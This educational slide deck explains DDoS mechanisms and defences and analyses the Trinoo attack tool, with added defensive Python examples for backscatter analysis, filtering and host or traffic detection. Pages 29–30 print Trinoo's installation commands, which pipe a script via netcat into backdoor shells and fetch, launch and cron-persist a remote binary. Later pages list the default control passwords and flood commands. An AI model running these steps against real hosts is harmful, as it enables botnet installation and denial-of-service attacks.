An Introduction to DDoS And the “Trinoo” Attack Tool Acknowledgement: Ray Lam, Ivan Wong

Upload: srinut31

Post on 13-Nov-2014

Page 1: DOS attack PPT

1.1 Operating System Concepts

An Introduction to DDoS

And the “Trinoo” Attack Tool

Acknowledgement: Ray Lam, Ivan Wong

Page 2: DOS attack PPT

Outline

Background on DDoS
- Attack mechanism
- Ways to defend

The attack tool – Trinoo
- Introduction
- Attack scenario
- Symptoms and defense
- Weaknesses and next evolution

Page 3: DOS attack PPT


Background on DDoS

Attack mechanism

Page 4: DOS attack PPT

Denial-of-Service

Flooding-based: send packets to the victim to exhaust its
- network resources
- system resources

Traditional DoS: one attacker
Distributed DoS: countless attackers

Page 5: DOS attack PPT

Attack Mechanism

Direct attack (A: attacker, V: victim, R: a third host whose address is spoofed)
- A -> V: TCP SYN, ICMP, UDP ... with R's address as the source IP address
- V -> R: TCP SYN-ACK, TCP RST, ICMP, UDP ... (the victim's replies go to the spoofed source)

Reflector attack (R: reflector)
- A -> R: TCP SYN, ICMP, UDP ... with V's address as the source IP address
- R -> V: TCP SYN-ACK, TCP RST, ICMP, UDP ... (the reflector's replies flood the victim)

Page 6: DOS attack PPT

Attack Architecture

Direct attack: Attacker (A) -> Masters (handlers) -> Agents (daemons or zombies) -> Victim (V)
- The agents send TCP SYN, ICMP, UDP ... to V (the source IP addresses are usually spoofed)

Reflector attack: Attacker (A) -> Masters (handlers) -> Agents (daemons or zombies) -> Reflectors -> Victim (V)
- The agents send TCP SYN, ICMP, UDP ... to the reflectors with V's address as the source IP address
- The reflectors send TCP SYN-ACK, TCP RST, ICMP, UDP ... to V

Page 7: DOS attack PPT

Attack Methods

Attack              | Attack packets                          | Reply packets
Smurf               | ICMP echo queries to broadcast address  | ICMP echo replies
SYN flooding        | TCP SYN packets                         | TCP SYN-ACK packets
RST flooding        | TCP packets to closed ports             | TCP RST packets
ICMP flooding       | ICMP queries                            | ICMP replies
                    | UDP packets to closed ports             | Port unreachable
                    | IP packets with low TTL                 | Time exceeded
DNS reply flooding  | DNS queries (recursive) to DNS servers  | DNS replies

Page 8: DOS attack PPT

BackScatter Analysis (Moore et al.)

Measured DoS activity on the Internet by observing the replies that spoofed-source attack packets provoke (the "backscatter").
- TCP (94+ %), UDP (2 %), ICMP (2 %)
- TCP attacks based mainly on SYN flooding
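How the backscatter measurement works, as an added example that is not part of the original slides: the telescope size, the packet records and the time window are constructed, and the reply-to-attack mapping follows the Attack Methods table on page 7. Moore et al. watched a lightly used /8 and treated unsolicited replies (SYN-ACK, RST, ICMP errors) arriving there as evidence of a flood against the reply's source address; the code below infers the attack type per victim, scales the observed count by 256 to estimate the rate the victim actually saw, and computes the protocol mix the slide quotes.

```python
# Added example (not from the slides): backscatter analysis in miniature.
# A network telescope owning an unused /8 receives replies (SYN-ACK, RST,
# ICMP errors) provoked by attack packets whose spoofed sources happened to
# fall inside that /8. The victim is the *source* of each such reply, and
# scaling the observed count by 2**prefix_len undoes the 1/256 sampling.
# Sample packets, window and telescope size are constructed assumptions.
from collections import Counter, defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    src: str             # for backscatter this is the DoS victim
    proto: str           # "tcp", "udp" or "icmp"
    tcp_flags: str = ""  # e.g. "SA" (SYN-ACK), "RA" (RST-ACK)
    icmp_type: int = -1  # 0 echo reply, 3 unreachable, 11 time exceeded


def classify_reply(pkt):
    """Return the attack type implied by an unsolicited reply, or None if the
    packet cannot be backscatter (a bare SYN is a request, not a reply)."""
    if pkt.proto == "tcp":
        if pkt.tcp_flags == "SA":
            return "SYN flood"
        if "R" in pkt.tcp_flags:
            return "TCP flood to closed ports (RST)"
        return None
    if pkt.proto == "icmp":
        return {0: "ICMP echo flood", 3: "UDP flood to closed ports",
                11: "low-TTL flood"}.get(pkt.icmp_type)
    if pkt.proto == "udp":
        return "UDP query flood (service answered)"
    return None


def analyze_backscatter(packets, window_seconds, telescope_prefix_len=8):
    """Group backscatter by victim, infer the attack type, estimate the real
    attack rate and compute the protocol mix of the backscatter."""
    scale = 2 ** telescope_prefix_len        # a /8 sees 1/256 of IPv4 space
    per_victim = defaultdict(Counter)
    proto_mix = Counter()
    for pkt in packets:
        kind = classify_reply(pkt)
        if kind is None:
            continue                          # not backscatter, ignore it
        per_victim[pkt.src][kind] += 1
        proto_mix[pkt.proto] += 1
    total = sum(proto_mix.values())
    report = {}
    for victim, kinds in per_victim.items():
        observed = sum(kinds.values())
        report[victim] = {
            "attack": kinds.most_common(1)[0][0],
            "observed": observed,
            "estimated_pps": observed * scale / window_seconds,
        }
    mix = {p: round(100.0 * n / total, 1) for p, n in proto_mix.items()} if total else {}
    return report, mix


# Constructed telescope capture covering a 2-second window (assumption)
SAMPLE = (
    [Packet("203.0.113.5", "tcp", tcp_flags="SA")] * 10   # SYN-flooded server
    + [Packet("198.51.100.7", "tcp", tcp_flags="RA")]     # closed-port probe
    + [Packet("192.0.2.9", "icmp", icmp_type=3)] * 2      # UDP flood victim
    + [Packet("203.0.113.77", "tcp", tcp_flags="S")]      # a scan, not backscatter
)

if __name__ == "__main__":
    report, mix = analyze_backscatter(SAMPLE, window_seconds=2)
    for victim, info in report.items():
        print(victim, info)
    print("protocol mix (%):", mix)
```

Ten SYN-ACKs in two seconds from 203.0.113.5 extrapolate to about 1280 attack packets per second at that victim; the bare SYN from 203.0.113.77 is discarded because a request cannot be backscatter.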

Page 9: DOS attack PPT


Background on DDoS

Ways to defend

Page 10: DOS attack PPT

Strategy

Three lines of defense:
- Attack prevention (before the attack)
- Attack detection and filtering (during the attack)
- Attack source traceback (during and after the attack)

Page 11: DOS attack PPT

Attack prevention

- Protect hosts from the installation of masters and agents by attackers
- Scan hosts for symptoms of agents being installed
- Monitor network traffic for known message exchanges among attackers, masters and agents

Page 12: DOS attack PPT

Attack prevention

Inadequate and hard to deploy:
- Don't-care users leave security holes
- ISP and enterprise networks do not have incentives

Page 13: DOS attack PPT

Attack source traceback

Identify the actual origin of a packet without relying on the packet's source IP address.

Two approaches:
- Routers record information about the packets they forward
- Routers send additional information about the packets to the destination

Page 14: DOS attack PPT

Attack source traceback

- Source traceback cannot stop an ongoing DDoS attack
- Cannot trace origins behind firewalls and NAT (network address translators)
- More to do for reflector attacks (the attack packets come from legitimate sources)
- Useful in post-attack law enforcement

Page 15: DOS attack PPT

Attack detection and filtering

Detection: identify the DDoS attack and the attack packets
Filtering: classify normal and attack packets, drop the attack packets

Page 16: DOS attack PPT

Attack detection and filtering

Can be done in 4 places:
- Victim's network
- Victim's ISP network
- Further upstream ISP networks
- Attack source networks

Dispersed agents send packets to a single victim, like pouring packets into the top of a funnel.

Page 17: DOS attack PPT

Attack detection and filtering

(Funnel diagram) From the attack source networks at the top, through the further upstream ISP networks and the victim's ISP network, down to the victim's network and the victim:
- Effectiveness of filtering increases towards the attack source networks
- Effectiveness of detection increases towards the victim

Page 18: DOS attack PPT

Attack detection and filtering

Detection
- Easy at the victim's network: large amount of attack packets
- Difficult at an individual agent's network: small amount of attack packets

Filtering
- Effective at the agents' networks: less likely to drop normal packets
- Ineffective at the victim's network: more normal packets are dropped

Page 19: DOS attack PPT

D&F at agent's network

- Usually cannot detect a DDoS attack
- Can filter attack packets with a spoofed source address:
  - attack packets in direct attacks
  - attack packets from agents to reflectors in reflector attacks
- Ensuring that all ISPs install ingress packet filtering is impossible

Page 20: DOS attack PPT

D&F at victim's network

Detect a DDoS attack by
- an unusually high volume of incoming traffic of certain packet types
- degraded server and network performance

Filtering is ineffective
- Attack and normal packets have the same destination: the victim's IP and port
- Attack packets have spoofed source IPs or come from many different IPs
- Attack and normal packets are indistinguishable
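The two ends of the funnel (pages 19 and 20) in code, as an added example that is not from the slides: the flow records, the agent network's prefix 10.1.0.0/16, the victim 198.51.100.10, the baseline rates and the detection factor are all constructed. Ingress filtering at the agent's network needs no detection at all, it only drops packets whose source address is not the network's own; at the victim, detection is a per-packet-type rate comparison and is easy, but the only filter key the attack packets share with normal traffic (destination IP and port) drops legitimate traffic along with the attack.

```python
# Added example (not from the slides): the two ends of the "funnel".
# (1) Ingress filtering at an agent's network (page 19) drops packets whose
#     source address does not belong to that network; spoofed attack packets
#     die there without anyone having to detect the attack.
# (2) At the victim's network (page 20) the attack shows up as a surge of one
#     packet type, but a filter keyed on what the packets have in common
#     (destination IP/port) also drops legitimate traffic.
# Flows, prefixes, baselines and the factor are constructed assumptions; the
# "legit" flag is ground truth we only know because we built the sample.
import ipaddress
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    t: float         # seconds since capture start
    src: str
    dst: str
    dport: int
    proto: str       # "tcp", "udp" or "icmp"
    flags: str = ""  # TCP flags, e.g. "S"
    legit: bool = True


def ingress_filter(flows, local_prefix):
    """Agent-side ingress filter: keep only packets sourced from local_prefix."""
    net = ipaddress.ip_network(local_prefix)
    kept, dropped = [], []
    for f in flows:
        (kept if ipaddress.ip_address(f.src) in net else dropped).append(f)
    return kept, dropped


def detect_at_victim(flows, window, baseline_pps, factor=10):
    """Victim-side detection: alert when the rate of one packet type within a
    window exceeds `factor` times its baseline. Returns [(window, key, pps)]."""
    counts = Counter()
    for f in flows:
        counts[(int(f.t // window), f.proto, f.flags, f.dport)] += 1
    alerts = []
    for (w, proto, flags, dport), n in sorted(counts.items()):
        pps = n / window
        if pps > factor * baseline_pps.get((proto, flags, dport), 0.0):
            alerts.append((w, (proto, flags, dport), pps))
    return alerts


def victim_filter_collateral(flows, key):
    """Drop everything matching (proto, flags, dport) at the victim and report
    which share of the attack and of the legitimate traffic that removes."""
    hit = [f for f in flows if (f.proto, f.flags, f.dport) == key]
    n_attack = max(sum(1 for f in flows if not f.legit), 1)
    n_legit = max(sum(1 for f in flows if f.legit), 1)
    return {
        "attack_dropped": sum(1 for f in hit if not f.legit) / n_attack,
        "legit_dropped": sum(1 for f in hit if f.legit) / n_legit,
    }


# Constructed sample: agent network 10.1.0.0/16 emitting 2 real flows and
# 50 spoofed SYNs towards the victim 198.51.100.10:80 during second 0.
AGENT_EGRESS = [
    Flow(0.1, "10.1.2.3", "198.51.100.10", 80, "tcp", "S"),
    Flow(0.2, "10.1.4.5", "203.0.113.9", 443, "tcp", "S"),
] + [Flow(0.3, f"172.16.{i}.1", "198.51.100.10", 80, "tcp", "S", legit=False)
     for i in range(50)]

# Constructed sample at the victim: 5 legitimate SYNs and one legitimate
# UDP/53 query per second for 2 s, plus the 50 spoofed SYNs in second 0.
VICTIM_INGRESS = (
    [Flow(s + 0.1 * k, f"192.0.2.{k}", "198.51.100.10", 80, "tcp", "S")
     for s in range(2) for k in range(5)]
    + [Flow(s + 0.5, "192.0.2.200", "198.51.100.10", 53, "udp") for s in range(2)]
    + [f for f in AGENT_EGRESS if not f.legit]
)
BASELINE = {("tcp", "S", 80): 5.0, ("udp", "", 53): 1.0}

if __name__ == "__main__":
    kept, dropped = ingress_filter(AGENT_EGRESS, "10.1.0.0/16")
    print(f"ingress filter: kept {len(kept)}, dropped {len(dropped)} spoofed")
    print("victim alerts:", detect_at_victim(VICTIM_INGRESS, 1.0, BASELINE))
    print("victim filter:", victim_filter_collateral(VICTIM_INGRESS, ("tcp", "S", 80)))
```

The ingress filter removes all 50 spoofed packets and none of the real ones without knowing that an attack is under way. The victim does see the attack (55 SYN/s against a baseline of 5), but blocking SYNs to port 80 there discards five sixths of its legitimate traffic, which is the slide's point about where filtering is effective and where detection is.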

Page 21: DOS attack PPT

D&F at victim's upstream ISP

- Often requested by the victim to filter the attack packets
- Alert protocol: the victim, whose link is being flooded, may not be able to receive the ACK from the ISP; requires strong authentication and encryption
- Filtering ineffective: the ISP network may also be jammed

Page 22: DOS attack PPT

D&F at further upstream ISP

Backpressure approach: the victim detects the DDoS attack, and the upstream ISPs filter the attack packets.

Page 23: DOS attack PPT


The attack tool – Trinoo

Introduction

Page 24: DOS attack PPT

Introduction

- Discovered in August 1999
- Daemons found on Solaris 2.x systems
- Attacked a system at the University of Minnesota; the victim was unusable for 2 days

Page 25: DOS attack PPT

Attack type

UDP flooding
- Default size of a UDP packet: 1000 bytes; a malloc() buffer of this size is sent with its uninitialized content
- Default period of attack: 120 seconds
- Destination port: randomly chosen from 0 – 65534

Page 26: DOS attack PPT


The attack tool – Trinoo

Attack scenario

Page 27: DOS attack PPT

Installation

1. Hack an account that acts as a repository for scanning tools, attack tools, Trinoo daemons, Trinoo masters, etc.
   Requirements: high bandwidth connection, large number of users, little administrative oversight

Page 28: DOS attack PPT

Installation

2. Compromise systems
   - Look for vulnerable systems: unpatched Sun Solaris and Linux
   - Remote buffer overflow exploitation
   - Set up a root account, open TCP ports
   - Keep a `friend list`

Page 29: DOS attack PPT

Installation

3. Install daemons using "netcat" ("nc") and "trin.sh"
   - netcat: network version of "cat"
   - trin.sh: shell script that prints the commands to set up a daemon; its output is piped by nc into whatever is listening on TCP port 1524 of each compromised host (one of the TCP ports opened in step 2)

./trin.sh | nc 128.aaa.167.217 1524 &
./trin.sh | nc 128.aaa.167.218 1524 &

Page 30: DOS attack PPT

Installation

trin.sh (the commands it prints fetch the daemon binary with rcp, start it, and install a crontab entry that restarts it every minute):

echo "rcp 192.168.0.1:leaf /usr/sbin/rpc.listen"
echo "echo rcp is done moving binary"
echo "chmod +x /usr/sbin/rpc.listen"
echo "echo launching trinoo"
echo "/usr/sbin/rpc.listen"
echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron"
echo "crontab cron"
echo "echo launched"
echo "exit"

Page 31: DOS attack PPT

Architecture

Direct attack: Attacker -> Masters (handlers) -> Agents (daemons or zombies) -> Victim

Page 32: DOS attack PPT

Communication ports

Monitor these specific ports to detect the presence of a master or an agent:
- Attacker -> Master: TCP port 27665
- Master -> Daemon: UDP port 27444
- Daemon -> Master: UDP port 31335

Page 33: DOS attack PPT

Password protection

- A password is used to prevent administrators or other hackers from taking control
- The encrypted password is compiled into the master and the daemon using crypt()
- The clear-text password is sent over the network; the session is not encrypted
- The received password is encrypted with crypt() and compared with the compiled-in value

Page 34: DOS attack PPT

Password protection

Default passwords:
- "l44adsl": trinoo daemon password
- "gOrave": trinoo master server startup password
- "betaalmostdone": trinoo master remote interface password
- "killme": trinoo master password to control the "mdie" command

Page 35: DOS attack PPT

Login to master

- Telnet to port 27665 of the host running the master
- Enter the password "betaalmostdone"
- The master warns if others try to connect to it

[root@r2 root]# telnet r1 27665
Trying 192.168.249.201...
Connected to r1.router (192.168.249.201).
Escape character is '^]'.
betaalmostdone
trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/]

trinoo>

Page 36: DOS attack PPT

Master and daemon

- Communicate by UDP packets
- Command line format: arg1 password arg2
- Default password is "l44adsl"
- When a daemon starts, it sends "HELLO" to the master
- The master maintains a list of daemons

Page 37: DOS attack PPT

Master commands

- dos IP: DoS the IP address specified ("aaa l44adsl IP" is sent to each daemon)
- mdos <ip1:ip2:ip3>: DoS the IPs simultaneously
- mtimer N: set the attack period to N seconds

Page 38: DOS attack PPT

Master commands

- bcast: list all daemons' IPs
- mdie password: shut down all daemons
- killdead: invite all daemons to send "HELLO" to the master; delete all dead daemons from the list

Page 39: DOS attack PPT

Daemon commands

- Not used directly; only used by the master to send commands to the daemons
- Consist of 3 letters, to avoid exposing the commands when the Unix command "strings" is run on the binary (by default, strings only prints runs of 4 or more printable characters)

Page 40: DOS attack PPT

Daemon commands

- aaa password IP: DoS the specified IP
- bbb password N: set the attack period to N seconds
- rsz password N: set the attack packet size to N bytes

Page 41: DOS attack PPT


The attack tool – Trinoo

Symptoms and defense

Page 42: DOS attack PPT

Symptoms

Masters: crontab entry, and the friend list kept in the files "…" and "…-b"

* * * * * /usr/sbin/rpc.listen

# ls -l ... ...-b
-rw------- 1 root root 25 Sep 26 14:46 ...
-rw------- 1 root root 50 Sep 26 14:30 ...-b

Page 43: DOS attack PPT

Symptoms

Masters (cont'd): socket status

# netstat -a --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 *:27665 *:* LISTEN
. . .
udp 0 0 *:31335 *:*
. . .

Page 44: DOS attack PPT

Symptoms

Masters (cont'd): file status

# lsof | egrep ":31335|:27665"
master 1292 root 3u inet 2460 UDP *:31335
master 1292 root 4u inet 2461 TCP *:27665 (LISTEN)

# lsof -p 1292
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
master 1292 root cwd DIR 3,1 1024 14356 /tmp/...
master 1292 root rtd DIR 3,1 1024 2 /
master 1292 root txt REG 3,1 30492 14357 /tmp/.../master
master 1292 root mem REG 3,1 342206 28976 /lib/ld-2.1.1.so
master 1292 root mem REG 3,1 63878 29116 /lib/libcrypt-2.1.1.so

Page 45: DOS attack PPT

Symptoms

Daemons: socket status

# netstat -a --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
. . .
udp 0 0 *:1024 *:*
udp 0 0 *:27444 *:*
. . .

Page 46: DOS attack PPT

Symptoms

Daemons (cont'd): file status

# lsof | egrep ":27444"
ns 1316 root 3u inet 2502 UDP *:27444

# lsof -p 1316
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
ns 1316 root cwd DIR 3,1 1024 153694 /tmp/...
ns 1316 root rtd DIR 3,1 1024 2 /
ns 1316 root txt REG 3,1 6156 153711 /tmp/.../ns
ns 1316 root mem REG 3,1 342206 28976 /lib/ld-2.1.1.so
ns 1316 root mem REG 3,1 63878 29116 /lib/libcrypt-2.1.1.so
ns 1316 root mem REG 3,1 4016683 29115 /lib/libc-2.1.1.so
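The netstat, crontab and lsof symptoms above turned into an automated host check, added here and not part of the slides or of Dittrich's analysis. The command outputs are parsed as text, so the block runs offline on the constructed samples below, which mirror the master host on pages 42 to 44; the port roles, the every-minute crontab heuristic and the "..." directory heuristic are this example's own.

```python
# Added example (not from the slides): a host check built from the symptoms
# the slides show. It parses the text of `netstat -a --inet`, a crontab and
# `lsof -p PID`, and reports the Trinoo indicators: the three control ports,
# an every-minute crontab entry (the trin.sh restart trick), and a process
# whose working directory or binary lives under a directory named "...".
# The sample outputs are constructed to match the slides.
TRINOO_PORTS = {
    ("tcp", 27665): "master control port (attacker -> master)",
    ("udp", 31335): "master port (daemon -> master)",
    ("udp", 27444): "daemon port (master -> daemon)",
}


def suspicious_sockets(netstat_text):
    """Parse `netstat -a --inet` lines; return [(proto, port, role)] hits."""
    hits = []
    for line in netstat_text.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[0] not in ("tcp", "udp"):
            continue                       # header, blank or ". . ." line
        port = parts[3].rsplit(":", 1)[-1]  # local address is "*:27665"
        if port.isdigit() and (parts[0], int(port)) in TRINOO_PORTS:
            key = (parts[0], int(port))
            hits.append((key[0], key[1], TRINOO_PORTS[key]))
    return hits


def suspicious_cron(crontab_text):
    """Return (command, is_default_trinoo_name) for every crontab line that
    runs something every minute; rpc.listen is the name trin.sh installs."""
    hits = []
    for line in crontab_text.splitlines():
        fields = line.split()
        if len(fields) >= 6 and fields[:5] == ["*"] * 5:
            hits.append((" ".join(fields[5:]), "rpc.listen" in fields[5]))
    return hits


def suspicious_lsof(lsof_text):
    """Parse `lsof -p PID` output; return (command, fd, path) for the cwd and
    txt entries whose path contains a component literally named '...'."""
    hits = []
    for line in lsof_text.splitlines():
        parts = line.split()
        if len(parts) < 9 or parts[0] == "COMMAND":
            continue
        cmd, fd, path = parts[0], parts[3], parts[-1]
        if fd in ("cwd", "txt") and "..." in path.split("/"):
            hits.append((cmd, fd, path))
    return hits


def host_report(netstat_text, crontab_text, lsof_text):
    """Combine the three checks; the host is flagged if any indicator fires."""
    sockets = suspicious_sockets(netstat_text)
    cron = suspicious_cron(crontab_text)
    files = suspicious_lsof(lsof_text)
    return {"sockets": sockets, "cron": cron, "files": files,
            "flagged": bool(sockets or cron or files)}


# Constructed samples mirroring the master host shown on the slides
SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 *:27665 *:* LISTEN
tcp 0 0 *:22 *:* LISTEN
udp 0 0 *:31335 *:*
udp 0 0 *:123 *:*
"""
SAMPLE_CRONTAB = """\
0 3 * * * /usr/bin/updatedb
* * * * * /usr/sbin/rpc.listen
"""
SAMPLE_LSOF = """\
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
master 1292 root cwd DIR 3,1 1024 14356 /tmp/...
master 1292 root rtd DIR 3,1 1024 2 /
master 1292 root txt REG 3,1 30492 14357 /tmp/.../master
master 1292 root mem REG 3,1 63878 29116 /lib/libcrypt-2.1.1.so
"""

if __name__ == "__main__":
    for key, value in host_report(SAMPLE_NETSTAT, SAMPLE_CRONTAB, SAMPLE_LSOF).items():
        print(key, value)
```

Run against live output (`netstat -a --inet`, `crontab -l`, `lsof -p PID`) the same functions apply unchanged; the port check is the cheapest and the one the slides recommend monitoring, while the cron and "..." checks catch a daemon that was rebuilt to use other ports.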

Page 47: DOS attack PPT

Defenses

- Prevent root-level compromise: patch systems, set up firewalls, monitor traffic
- Block the abused ports (high-numbered UDP ports); trade-off: this also blocks normal programs using the same ports

Page 48: DOS attack PPT


The attack tool – Trinoo

Weaknesses and next evolution

Page 49: DOS attack PPT

Weaknesses

- Single kind of attack (UDP flooding): easily defended by a single defense tool
- Uses an IP as the destination address: "moving target defense", the victim changes its IP to avoid the attack

Page 50: DOS attack PPT

Weaknesses

Password, encrypted password and commands are visible in the binary images; use the Unix command "strings" to obtain them:
- strings master
- strings -n3 ns

Check whether Trinoo is found; crack the encrypted passwords.
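What `strings -n3` buys you, as an added example that is not from the slides: a minimal `strings` emulation run at the default minimum length 4 and at 3 over a constructed byte blob standing in for a daemon binary (it is not a real Trinoo binary; the embedded strings are the defaults the slides list, plus two made-up master addresses). It also pulls out dotted-quad addresses, which is the step the "Uproot a Trinoo network" page relies on.

```python
# Added example (not from the slides): why the three-letter daemon commands
# need `strings -n3`. `strings` prints runs of printable characters at least
# N bytes long, with N defaulting to 4, so "aaa"/"bbb"/"rsz" are invisible at
# the default length while the default passwords are not.
# FAKE_DAEMON is a constructed stand-in for a daemon binary.
import re

# Default credentials and daemon commands listed on the slides
TRINOO_PASSWORDS = {"l44adsl", "gOrave", "betaalmostdone", "killme"}
TRINOO_DAEMON_CMDS = {"aaa", "bbb", "rsz"}


def strings(data, min_len=4):
    """Emulate `strings -n min_len`: runs of >= min_len printable ASCII bytes."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def trinoo_indicators(data, min_len=4):
    """Return the password strings and command strings visible at this length,
    plus every dotted quad that could be a hard-coded master address."""
    found = set(strings(data, min_len))
    ips = {s for s in found if re.fullmatch(r"(\d{1,3}\.){3}\d{1,3}", s)}
    return {
        "passwords": sorted(found & TRINOO_PASSWORDS),
        "commands": sorted(found & TRINOO_DAEMON_CMDS),
        "master_ips": sorted(ips),
    }


# Constructed stand-in for a daemon binary: an ELF-like header, then the
# kind of data the slides describe (password, commands, HELLO, master IPs).
FAKE_DAEMON = (
    b"\x7fELF\x01\x01\x01\x00" + b"\x00" * 8
    + b"l44adsl\x00" + b"aaa\x00bbb\x00rsz\x00"
    + b"HELLO\x00" + b"192.168.0.1\x00" + b"192.168.0.2\x00"
    + b"\x90\x90\xcc\x00"
)

if __name__ == "__main__":
    for n in (4, 3):
        print(f"strings -n{n}:", strings(FAKE_DAEMON, n))
        print(f"indicators at -n{n}:", trinoo_indicators(FAKE_DAEMON, n))
```

At the default length only the password and the addresses surface; dropping to 3 exposes the command vocabulary, which is exactly the evasion the daemon's three-letter commands were designed around.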

Page 51: DOS attack PPT

Weaknesses

- The password travels in plain text on the network
- The daemon password is frequently sent in master-to-daemon commands
- Get the password with "ngrep" or "tcpdump", which show the UDP payload
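The master/daemon exchange of pages 36 to 40 as it looks on the wire, and why the weakness on this page matters, as an added example not taken from the slides or from Dittrich's analysis: the datagrams are constructed, the addresses are made up, and the message formats follow the slides ("arg1 password arg2" to UDP 27444, "HELLO" to UDP 31335). The parser does what ngrep or tcpdump with payload printing lets an analyst do by hand: reconstruct which daemons answer to which master, recover the clear-text daemon password and list the targets.

```python
# Added example (not from the slides): Trinoo's master<->daemon traffic as
# UDP payloads. The daemon compares crypt() of the received password with a
# compiled-in hash, but the password itself rides in clear text in every
# "aaa/bbb/rsz" command, so anything that shows UDP payloads recovers it.
# Datagram tuples (src, dst, dport, payload) and addresses are constructed.
import re
from collections import defaultdict

MASTER_TO_DAEMON_PORT = 27444   # UDP, carries "cmd password arg"
DAEMON_TO_MASTER_PORT = 31335   # UDP, carries "HELLO" when a daemon starts

DAEMON_CMDS = {
    "aaa": "dos",    # arg = target IP
    "bbb": "timer",  # arg = attack period in seconds
    "rsz": "size",   # arg = attack packet size in bytes
}
CMD_RE = re.compile(rb"^([a-z]{3}) (\S+) (\S+)$")


def parse_datagram(src, dst, dport, payload):
    """Decode one datagram into an event dict, or None if it is not Trinoo C2."""
    if dport == DAEMON_TO_MASTER_PORT and payload.strip() == b"HELLO":
        return {"kind": "hello", "daemon": src, "master": dst}
    if dport == MASTER_TO_DAEMON_PORT:
        m = CMD_RE.match(payload.strip())
        if m and m.group(1).decode() in DAEMON_CMDS:
            cmd, password, arg = (g.decode() for g in m.groups())
            return {"kind": DAEMON_CMDS[cmd], "master": src, "daemon": dst,
                    "password": password, "arg": arg}
    return None


def reconstruct(datagrams):
    """Replay a capture: map masters to their daemons, collect the clear-text
    daemon password(s) and the IPs the daemons were told to flood."""
    daemons = defaultdict(set)
    passwords, targets, events = set(), set(), []
    for src, dst, dport, payload in datagrams:
        ev = parse_datagram(src, dst, dport, payload)
        if ev is None:
            continue
        events.append(ev)
        daemons[ev["master"]].add(ev["daemon"])
        if ev["kind"] != "hello":
            passwords.add(ev["password"])
            if ev["kind"] == "dos":
                targets.add(ev["arg"])
    return {"events": events,
            "daemons": {m: sorted(d) for m, d in daemons.items()},
            "passwords": sorted(passwords), "targets": sorted(targets)}


# Constructed capture: two daemons register, the master pushes the defaults
# the slides quote (120 s period, 1000-byte packets), then "dos 203.0.113.7".
CAPTURE = [
    ("10.0.0.11", "10.0.0.1", 31335, b"HELLO"),
    ("10.0.0.12", "10.0.0.1", 31335, b"HELLO"),
    ("10.0.0.1", "10.0.0.11", 27444, b"bbb l44adsl 120"),
    ("10.0.0.1", "10.0.0.11", 27444, b"rsz l44adsl 1000"),
    ("10.0.0.1", "10.0.0.11", 27444, b"aaa l44adsl 203.0.113.7"),
    ("10.0.0.1", "10.0.0.12", 27444, b"aaa l44adsl 203.0.113.7"),
    ("10.0.0.50", "10.0.0.1", 27444, b"not trinoo at all"),  # unrelated UDP
    ("10.0.0.1", "10.0.0.11", 53, b"\x12\x34\x01\x00"),       # DNS, ignored
]

if __name__ == "__main__":
    result = reconstruct(CAPTURE)
    for ev in result["events"]:
        print(ev)
    print("daemons per master:", result["daemons"])
    print("recovered password(s):", result["passwords"])
    print("targets:", result["targets"])
```

Feeding this the UDP payloads from a real capture gives exactly what the "Uproot a Trinoo network" page needs: the master address from the HELLO destinations and the daemon password for an "mdie"-style shutdown, without touching any host.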

Page 52: DOS attack PPT

Uproot a Trinoo network

- Locate a daemon; use "strings" to obtain the IPs of the masters
- Contact the sites with a master installed; those sites check the list of daemons, by inspecting the file "…" or by getting the master login password and using the "bcast" command
- Get the "mdie" password; use "mdie" to shut down all daemons; repeat "mdie" periodically, as the daemons are restarted by crontab

Page 53: DOS attack PPT

Next evolution

- Combination of several attack types (SYN flood, UDP flood, ICMP flood ...) for a higher chance of a successful attack
- Stronger encryption of embedded strings and passwords
- Use of an encrypted communication channel
- Communication over a protocol that is difficult to detect or block, e.g. ICMP

Page 54: DOS attack PPT


References

R. Chang, “Defending against Flooding-Based Distributed Denial-of-Service Attacks: A Tutorial,” Oct. 2002

D. Dittrich, “The DoS Project’s ‘Trinoo’ Distributed Denial of Service Attack Tool,” http://staff.washington.edu/dittrich/misc/trinoo.analysis.txt, Oct. 1999